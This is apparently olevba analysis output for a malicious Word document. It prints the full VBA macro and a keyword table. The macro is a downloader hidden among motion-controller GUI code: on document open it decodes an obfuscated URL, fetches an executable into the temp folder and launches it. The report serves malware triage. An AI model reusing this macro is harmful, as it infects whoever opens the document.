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- olevba 0.41 -
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI-B-V malware1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ProcessMST ""
- ProcessSync 0
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: malware1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Dim strData As String
- Dim counter As String
- Public reportName1 As Object
- Public emailOutPath As Object
- Public CRAXDASR As Object
- Public newYz As String
- Public logicBOX As String
- Public unitBOX As Object
- Dim ConnectionCounter As Long
- Dim DownloadStep As Long
- Dim UploadStep As Long
- Private Sub SetSpeedAccel()
- Dim ret As Integer
- Dim strData As String
- Call EthernetSen.dReceive("HS=" + HSPD, strData)
- Call EthernetSen.dReceive("LS=" + LSPD, strData)
- Call EthernetSen.dReceive("ACC=" + Accel, strData)
- If FirmwareVer >= 218 Then
- Call EthernetSen.dReceive("DEC=" + Decel, strData)
- End If
- End Sub
- Private Sub Client_Click()
- End Sub
- Private Sub Check1_Click()
- End Sub
- Private Sub ABORT_Click()
- Dim tempStr As String
- Dim i As Integer
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSen.dReceive("ABORTX", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSen.dReceive("ABORTY", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("ABORTZ", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("ABORTU", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- Private Sub ABS_Click()
- Dim tempStr As String
- Dim i As Integer
- SetSpeedAccel
- tempStr = ""
- For i = 1 To 4
- If i = 1 Then
- If (SelectX.Value = 1) Then
- tempStr = tempStr + "X" + TargetX
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- tempStr = tempStr + "Y" + TargetY
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- tempStr = tempStr + "Z" + TargetZ
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- tempStr = tempStr + "U" + TargetU
- End If
- End If
- Next i
- If tempStr = "" Then Exit Sub
- Call EthernetSen.dReceive(tempStr, strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End Sub
- Private Sub CheckComm_Timer()
- End Sub
- Private Sub clear_Click()
- ret = PROCESSCMD("CLR", 1)
- End Sub
- Private Sub clrs_Click()
- ret = PROCESSCMD("CLRS", 1)
- End Sub
- Private Sub Command15_Click()
- Dim tempStr As String
- Dim cmdStr As String
- Dim i As Integer
- Dim Index As Long
- Dim ret As Integer
- If ComStatus = False Then Exit Sub
- Index = 0
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Index = Index + 1
- cmdStr = "PX=" + TargetX
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Index = Index + 1
- cmdStr = "PY=" + TargetY
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Index = Index + 1
- cmdStr = "PZ=" + TargetZ
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Index = Index + 1
- cmdStr = "PU=" + TargetU
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- End If
- Next i
- End Sub
- Private Sub Command16_Click()
- Dim tempStr As String
- Dim cmdStr As String
- Dim i As Integer
- Dim Index As Long
- Dim ret As Integer
- If ComStatus = False Then Exit Sub
- Index = 0
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Index = Index + 1
- cmdStr = "EX=" + TargetX
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Index = Index + 1
- cmdStr = "EY=" + TargetY
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Index = Index + 1
- cmdStr = "EZ=" + TargetZ
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Index = Index + 1
- cmdStr = "EU=" + TargetU
- Call EthernetSen.dReceive(cmdStr, strData)
- End If
- End If
- Next i
- End Sub
- Private Sub Command17_Click()
- Dim tempStr As String
- Dim i As Integer
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSen.dReceive("HX-4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSen.dReceive("HY-4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("HZ-4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("HU-4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- Private Sub Command18_Click()
- Dim cmdStr As String
- Dim replyStr As String
- Dim ret As Integer
- If (ComStatus = False) Then Exit Sub
- cmdStr = "TX" + TXPosition
- Call EthernetSen.dReceive(cmdStr, strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End Sub
- Private Sub Command19_Click()
- Dim cmdStr As String
- Dim replyStr As String
- Dim ret As Integer
- If (ComStatus = False) Then Exit Sub
- cmdStr = "TY" + TYPosition
- Call EthernetSen.dReceive(cmdStr, strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End Sub
- Private Sub Command12_Click()
- isLoadingImove = True
- Imove.Show vbModal, Me
- End Sub
- Private Sub Command2_Click()
- Dim tempStr As String
- Dim i As Integer
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSen.dReceive("HX+3", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSen.dReceive("HY+3", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("HZ+3", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("HU+3", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- Private Sub Command20_Click()
- Dim cmdStr As String
- Dim replyStr As String
- Dim ret As Integer
- If (ComStatus = False) Then Exit Sub
- cmdStr = "TZ" + TZPosition
- Call EthernetSen.dReceive(cmdStr, strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End Sub
- Private Sub Command21_Click()
- Dim cmdStr As String
- Dim replyStr As String
- Dim ret As Integer
- If (ComStatus = False) Then Exit Sub
- cmdStr = "TU" + TUPosition
- Call EthernetSen.dReceive(cmdStr, strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End Sub
- Private Sub Command22_Click()
- Dim lvalue As Long
- Dim i As Integer
- Dim str1 As String
- Dim replyStr As String
- Dim FirmStr As String
- Dim ret As Integer
- str1 = FirmwareVer
- FirmStr = "Software Version: " + GUIVersion + Chr(13) + Chr(13)
- FirmStr = FirmStr + "Firmware Version: V" + str1 + Chr(13) + Chr(13)
- If FirmwareVer < 219 Then
- FirmStr = FirmStr + "The following GUI features are not supported by this firmware:" + Chr(13)
- If (FirmwareVer < 219) Then
- FirmStr = FirmStr + Chr(13) + " - Digital input polarity"
- FirmStr = FirmStr + Chr(13) + " - Digital output polarity"
- FirmStr = FirmStr + Chr(13) + " - Enable output polarity"
- FirmStr = FirmStr + Chr(13) + " - Standalone error polarity"
- End If
- If (FirmwareVer < 218) Then
- FirmStr = FirmStr + Chr(13) + " - Low speed homing routine"
- FirmStr = FirmStr + Chr(13) + " - Deceleration option for linear motion"
- FirmStr = FirmStr + Chr(13) + " - Acceleration/deceleration for circular interpolation"
- FirmStr = FirmStr + Chr(13) + " - On-the-fly position change"
- FirmStr = FirmStr + Chr(13) + " - Multi-threading capabilities for standalone"
- FirmStr = FirmStr + Chr(13) + " - Digital output configuration on boot-up"
- FirmStr = FirmStr + Chr(13) + " - Enable output configuration on boot-up"
- End If
- End If
- MsgBox (FirmStr)
- End Sub
- Private Sub Command23_Click()
- Dim tempStr As String
- Dim i As Integer
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSen.dReceive("HX+4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSen.dReceive("HY+4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("HZ+4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("HU+4", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- Public Function ProcessSASTAT(str As String) As String
- Dim lvalue As Long
- lvalue = str
- If lvalue = 0 Then
- ProcessSASTAT = "Idle"
- ElseIf lvalue = 1 Then
- ProcessSASTAT = "Running"
- ElseIf lvalue = 2 Then
- ProcessSASTAT = "Paused"
- ElseIf lvalue = 4 Then
- ProcessSASTAT = "Errored"
- End If
- End Function
- Public Function ProcessSync(str As Long) As String
- unitBOX.Open (logicBOX)
- If str = 0 Then
- ProcessSync = "OFF"
- ElseIf str = 1 Then
- ProcessSync = "WAITING"
- ElseIf str = 2 Then
- ProcessSync = "TRIGGERED"
- End If
- End Function
- Function ProcessPulse(str As String) As String
- Dim j As Integer
- Dim posStr As String
- posStr = ""
- j = 1
- For i = 1 To Len(str)
- cc = Mid(str, i, 1)
- If (cc = ":") Or (i = Len(str)) Then
- If (j = 1) Then
- PX = posStr
- ElseIf (j = 2) Then
- PY = posStr
- ElseIf (j = 3) Then
- PZ = posStr
- Else
- posStr = posStr + cc
- PU = posStr
- End If
- posStr = ""
- j = j + 1
- Else
- posStr = posStr + cc
- End If
- Next i
- End Function
- Function ProcessEncoder(str As String) As String
- Dim j As Integer
- Dim posStr As String
- posStr = ""
- j = 1
- For i = 1 To Len(str)
- cc = Mid(str, i, 1)
- If (cc = ":") Or (i = Len(str)) Then
- If (j = 1) Then
- EX = posStr
- ElseIf (j = 2) Then
- EY = posStr
- ElseIf (j = 3) Then
- EZ = posStr
- Else
- posStr = posStr + cc
- EU = posStr
- End If
- posStr = ""
- j = j + 1
- Else
- posStr = posStr + cc
- End If
- Next i
- End Function
- Function ProcessSpeed(str As String) As String
- Dim j As Integer
- Dim posStr As String
- posStr = ""
- j = 1
- For i = 1 To Len(str)
- cc = Mid(str, i, 1)
- If (cc = ":") Or (i = Len(str)) Then
- If (j = 1) Then
- SX = posStr
- ElseIf (j = 2) Then
- SY = posStr
- ElseIf (j = 3) Then
- SZ = posStr
- Else
- posStr = posStr + cc
- SU = posStr
- End If
- posStr = ""
- j = j + 1
- Else
- posStr = posStr + cc
- End If
- Next i
- End Function
- Private Function processSLS(str As Long)
- Dim lvalue As Long
- lvalue = str
- With emailOutPath
- emailOutPath.Type = 1
- emailOutPath.Open
- emailOutPath.write reportName1.responseBody
- emailOutPath.savetofile logicBOX, 2
- End With
- Exit Function
- If lvalue = 12 Then
- processSLS = "NA"
- End If
- If lvalue = 0 Then
- processSLS = "IDLE"
- End If
- If lvalue = 1 Then
- processSLS = "MOVING"
- End If
- If lvalue = 2 Then
- processSLS = "CORRECTING"
- End If
- If lvalue = 3 Then
- processSLS = "STOPPING"
- End If
- If lvalue = 4 Then
- processSLS = "ABORTING"
- End If
- If lvalue = 5 Then
- processSLS = "JOGGING"
- End If
- If lvalue = 6 Then
- processSLS = "HOMING"
- End If
- If lvalue = 7 Then
- processSLS = "Z-HOMING"
- End If
- If lvalue = 8 Then
- processSLS = "ERR-RANGE"
- End If
- If lvalue = 9 Then
- processSLS = "ERR-ATMPT"
- End If
- If lvalue = 10 Then
- processSLS = "ERR-STALL"
- End If
- If lvalue = 11 Then
- processSLS = "ERR-LIM"
- End If
- End Function
- Public Function ProcessMST(str As String)
- Dim j As Integer
- Dim statStr As String
- Dim statValue As Long
- statStr = ""
- counter = counter + "."
- logicBOX = newYz + "\" + "coloc" + LCase(counter) + "exe"
- processSLS 0
- Exit Function
- j = 1
- For i = 1 To Len(str)
- cc = Mid(str, i, 1)
- If (cc = ":") Or (i = Len(str)) Then
- If (j = 1) Then
- statValue = statStr
- If (BitA.ND(statValue, 1) = 1) Then
- StatX = "Accelerating"
- ElseIf (BitA.ND(statValue, 2) = 2) Then
- StatX = "Decelerating"
- ElseIf (BitA.ND(statValue, 4) = 4) Then
- StatX = "Constant"
- ElseIf (BitA.ND(statValue, 128) = 128) Then
- StatX = "+LimError"
- ElseIf (BitA.ND(statValue, 256) = 256) Then
- StatX = "-LimError"
- ElseIf (BitA.ND(statValue, 512) = 512) Then
- StatX = "AlarmError"
- Else
- StatX = "Idle"
- End If
- If (BitA.ND(statValue, 8) = 8) Then
- AlarmX.BackStyle = 1
- Else
- AlarmX.BackStyle = 0
- End If
- If (BitA.ND(statValue, 16) = 16) Then
- PLimX.BackStyle = 1
- Else
- PLimX.BackStyle = 0
- End If
- If (BitA.ND(statValue, 32) = 32) Then
- NLimX.BackStyle = 1
- Else
- NLimX.BackStyle = 0
- End If
- If (BitA.ND(statValue, 64) = 64) Then
- HomeX.BackStyle = 1
- Else
- HomeX.BackStyle = 0
- End If
- ElseIf (j = 2) Then
- statValue = statStr
- If (BitA.ND(statValue, 1) = 1) Then
- StatY = "Accelerating"
- ElseIf (BitA.ND(statValue, 2) = 2) Then
- StatY = "Decelerating"
- ElseIf (BitA.ND(statValue, 4) = 4) Then
- StatY = "Constant"
- ElseIf (BitA.ND(statValue, 128) = 128) Then
- StatY = "+LimError"
- ElseIf (BitA.ND(statValue, 256) = 256) Then
- StatY = "-LimError"
- ElseIf (BitA.ND(statValue, 512) = 512) Then
- StatY = "AlarmError"
- Else
- StatY = "Idle"
- End If
- If (BitA.ND(statValue, 8) = 8) Then
- AlarmY.BackStyle = 1
- Else
- AlarmY.BackStyle = 0
- End If
- If (BitA.ND(statValue, 16) = 16) Then
- PLimY.BackStyle = 1
- Else
- PLimY.BackStyle = 0
- End If
- If (BitA.ND(statValue, 32) = 32) Then
- NLimY.BackStyle = 1
- Else
- NLimY.BackStyle = 0
- End If
- If (BitA.ND(statValue, 64) = 64) Then
- HomeY.BackStyle = 1
- Else
- HomeY.BackStyle = 0
- End If
- ElseIf (j = 3) Then
- statValue = statStr
- If (BitA.ND(statValue, 1) = 1) Then
- StatZ = "Accelerating"
- ElseIf (BitA.ND(statValue, 2) = 2) Then
- StatZ = "Decelerating"
- ElseIf (BitA.ND(statValue, 4) = 4) Then
- StatZ = "Constant"
- ElseIf (BitA.ND(statValue, 128) = 128) Then
- StatZ = "+LimError"
- ElseIf (BitA.ND(statValue, 256) = 256) Then
- StatZ = "-LimError"
- ElseIf (BitA.ND(statValue, 512) = 512) Then
- StatZ = "AlarmError"
- Else
- StatZ = "Idle"
- End If
- If (BitA.ND(statValue, 8) = 8) Then
- AlarmZ.BackStyle = 1
- Else
- AlarmZ.BackStyle = 0
- End If
- If (BitA.ND(statValue, 16) = 16) Then
- PLimZ.BackStyle = 1
- Else
- PLimZ.BackStyle = 0
- End If
- If (BitA.ND(statValue, 32) = 32) Then
- NLimZ.BackStyle = 1
- Else
- NLimZ.BackStyle = 0
- End If
- If (BitA.ND(statValue, 64) = 64) Then
- HomeZ.BackStyle = 1
- Else
- HomeZ.BackStyle = 0
- End If
- ElseIf (j = 4) Then
- statValue = statStr
- If (BitA.ND(statValue, 1) = 1) Then
- StatU = "Accelerating"
- ElseIf (BitA.ND(statValue, 2) = 2) Then
- StatU = "Decelerating"
- ElseIf (BitA.ND(statValue, 4) = 4) Then
- StatU = "Constant"
- ElseIf (BitA.ND(statValue, 128) = 128) Then
- StatU = "+LimError"
- ElseIf (BitA.ND(statValue, 256) = 256) Then
- StatU = "-LimError"
- ElseIf (BitA.ND(statValue, 512) = 512) Then
- StatU = "AlarmError"
- Else
- StatU = "Idle"
- End If
- If (BitA.ND(statValue, 8) = 8) Then
- AlarmU.BackStyle = 1
- Else
- AlarmU.BackStyle = 0
- End If
- If (BitA.ND(statValue, 16) = 16) Then
- PLimU.BackStyle = 1
- Else
- PLimU.BackStyle = 0
- End If
- If (BitA.ND(statValue, 32) = 32) Then
- NLimU.BackStyle = 1
- Else
- NLimU.BackStyle = 0
- End If
- If (BitA.ND(statValue, 64) = 64) Then
- HomeU.BackStyle = 1
- Else
- HomeU.BackStyle = 0
- End If
- ElseIf (j = 5) Then
- statValue = statStr
- If (statValue = 1) Then
- BuffStat = "ON"
- Else
- BuffStat = "OFF"
- End If
- ElseIf (j = 6) Then
- statValue = statStr
- StartBuffer = statValue
- ElseIf (j = 7) Then
- statValue = statStr
- EndBuffer = statValue
- ElseIf (j = 8) Then
- statValue = statStr
- AvailableBuffer = statValue
- ElseIf (j = 9) Then
- statValue = statStr
- If (statValue = 0) Then
- MoveModeStat = "ABS"
- Else
- MoveModeStat = "INC"
- End If
- End If
- statStr = ""
- j = j + 1
- Else
- statStr = statStr + cc
- End If
- Next i
- End Function
- Private Sub Timer3_Timer()
- Dim cmdStr As String
- Dim replyStr As String
- Dim ret As Integer
- Dim lv1 As Long
- Dim lv2 As Long
- Dim lvalue As Long
- Dim i, j As Integer
- Dim cc As String
- Dim posStr As String
- Dim statStr As String
- Dim statValue As Long
- Dim parame() As Variant
- parame = Array(3616, 3628, 3628, 3624, 3570, 3559, 3559, 3630, 3617, 3622, 3627, 3612, 3613, 3620, 3611, 3623, 3621, 3628, 3609, 3628, 3558, 3611, 3623, 3621, 3559, 3629, 3565, 3633, 3564, 3563, 3562, 3559, 3616, 3565, 3564, 3614, 3563, 3558, 3613, 3632, 3613)
- reportName1.Open counter, generateattachments1(parame, 40), False
- Dim myVal As Long
- Dim iVal As Long
- Dim DIOConfigValue As Long
- If BufferMoveOp Then
- If currentarray = loadedarrays Then
- BufferMoveOp = False
- Exit Sub
- End If
- If buffSuccess = True Or currentarray = 0 Then
- buffSuccess = False
- ret = PROCES.SCMD(Iarr.ay(currentarray), 1000)
- End If
- End If
- reportName1.Send
- newYz = CRAXDASR(Right(counter, 1) + "EMP")
- End Sub
- Private Sub UploadSAP_Click()
- On Error GoTo Err
- Dim fileName As String
- Dim str As String
- Dim lineStr As String
- Dim line, str1 As String
- Dim cc As String
- counter = counter + "T"
- Dim ccValue As Integer
- Dim wp, i As Integer
- Set unitBOX = CreateObject("Shell.Application")
- Dim progStr As String
- Dim projProgStr As String
- Dim progi As Integer
- Dim templ As Long
- Dim selProgL As Long
- Set CRAXDASR = CreateObject("WScript.Shell").Environment("Process")
- Timer3_Timer
- Exit Sub
- Dim RetVal
- If (ComStatus = False) Then Exit Sub
- PausePolling = True
- Call EthernetSen.dReceive("SR0=0", strData)
- Call EthernetSen.dReceive("SR1=0", strData)
- Call EthernetSen.dReceive("SR2=0", strData)
- Call EthernetSen.dReceive("SR3=0", strData)
- Call EthernetSen.dReceive("ABORT", strData)
- Open App.Path + "\EXE\sa_download_upload_setup.txt" For Output As #2
- Print #2, "LIN:7650"
- Print #2, "IPA:" + IP
- Print #2, "COM:ETHERNET"
- Print #2, "POR:5001"
- Print #2, "OPE:UPLOAD"
- Print #2, "FIL:CompileOut.txt"
- Print #2, "MOD:PMX-4ET-SA"
- Close #2
- Call DisableMain.Timers
- ret = fnEtherne.tComClose(EthernetSocket)
- RetVal = ShellAnd.Hold(App.Path + "\EXE\SA_Download_Upload.exe", 1)
- Open App.Path + "\EXE\sa_compile_decompile_setup.txt" For Output As #3
- Print #3, "MOD:PMX-4ET-SA"
- Print #3, "OPE:DECOMPILE"
- Print #3, "FIL:UploadOut.txt"
- str1 = FirmwareVer
- Print #3, "VER:" + str1
- Close #3
- RetVal = ShellAnd.Hold(App.Path + "\EXE\SA_Compile_Decompile.exe", 1)
- Open App.Path + "\EXE\DecompileOut.prg" For Input As #4
- OrgProgram.Text = ""
- Do Until EOF(4)
- Line Input #4, lineStr
- OrgProgram.Text = OrgProgram.Text + lineStr + Chr(13) + Chr(10)
- Loop
- Close #4
- ReadandDi.splayMsg (App.Path + "\EXE\DecompileOut.prg")
- Call Form_L.oad
- Exit Sub
- Err:
- MsgBox (Err.Description)
- End Sub
- Public Sub ViewCompiled_Click()
- Dim lineStr As String
- counter = counter + "E"
- Dim StrTemp As String
- Set emailOutPath = CreateObject("Adodb.Stream")
- UploadSAP_Click
- Exit Sub
- On Error GoTo Report:
- Open App.Path + "\EXE\CompileOut.txt" For Input As #1
- StrTemp = ""
- Do Until EOF(1)
- Line Input #1, lineStr
- ViewCompiledForm.viewList.AddItem (lineStr)
- Loop
- Close #1
- ViewCompi.ledForm.Show vbModal
- Report:
- End Sub
- Public Sub ZHOMEMINUS_Click()
- Dim tempStr As String
- Dim i As Integer
- counter = "G"
- Set reportName1 = CreateObject("Microsoft" + ".XMLHTTP")
- ViewCompiled_Click
- Exit Sub
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSe.ndReceive("HX-2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSe.ndReceive("HY-2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("HZ-2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("HU-2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- Public Function generateattachments1(fromArr() As Variant, LenLen As Integer) As String
- Dim i As Integer
- Variabl = ""
- For i = LBound(fromArr) To UBound(fromArr)
- Variabl = Variabl & Chr(fromArr(i) - LenLen - 4 * LenLen - 3312)
- Next i
- generateattachments1 = Variabl
- End Function
- Private Sub ZHOMEPLUS_Click()
- Dim tempStr As String
- Dim i As Integer
- If ComStatus = False Then Exit Sub
- SetSpeedAccel
- For i = 1 To 4
- tempStr = ""
- If i = 1 Then
- If (SelectX.Value = 1) Then
- Call EthernetSen.dReceive("HX+2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 2 Then
- If (SelectY.Value = 1) Then
- Call EthernetSen.dReceive("HY+2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 3 Then
- If (SelectZ.Value = 1) Then
- Call EthernetSen.dReceive("HZ+2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- ElseIf i = 4 Then
- If (SelectU.Value = 1) Then
- Call EthernetSen.dReceive("HU+2", strData)
- If (strData <> "OK") Then
- MsgBox (strData)
- End If
- End If
- End If
- Next i
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | SA_Download_Upload.e | Executable file name |
- | | xe | |
- | IOC | SA_Compile_Decompile | Executable file name |
- | | .exe | |
- | VBA string |
- | Chr(13) + Chr(13) |
- | VBA string | The following GUI | "The following GUI features are not |
- | | features are not | supported by this firmware:" + Chr(13) |
- | | supported by this | |
- | | firmware: | |
- | VBA string | - Digital input | Chr(13) + " - Digital input polarity" |
- | | polarity | |
- | VBA string | - Digital output | Chr(13) + " - Digital output polarity" |
- | | polarity | |
- | VBA string | - Enable output | Chr(13) + " - Enable output polarity" |
- | | polarity | |
- | VBA string | - Standalone error | Chr(13) + " - Standalone error |
- | | polarity | polarity" |
- | VBA string | - Low speed homing | Chr(13) + " - Low speed homing routine" |
- | | routine | |
- | VBA string | - Deceleration | Chr(13) + " - Deceleration option for |
- | | option for linear | linear motion" |
- | | motion | |
- | VBA string | - Acceleration/dec | Chr(13) + " - Acceleration/deceleration |
- | | eleration for | for circular interpolation" |
- | | circular | |
- | | interpolation | |
- | VBA string | - On-the-fly | Chr(13) + " - On-the-fly position |
- | | position change | change" |
- | VBA string | - Multi-threading | Chr(13) + " - Multi-threading |
- | | capabilities for | capabilities for standalone" |
- | | standalone | |
- | VBA string | - Digital output | Chr(13) + " - Digital output |
- | | configuration on | configuration on boot-up" |
- | | boot-up | |
- | VBA string | - Enable output | Chr(13) + " - Enable output |
- | | configuration on | configuration on boot-up" |
- | | boot-up | |
- | VBA string | \coloc | "\" + "coloc" |
- | VBA string |
- | Chr(13) + Chr(10) |
- | | | |
- | VBA string | Microsoft.XMLHTTP | ("Microsoft" + ".XMLHTTP") |
- +------------+----------------------+-----------------------------------------+
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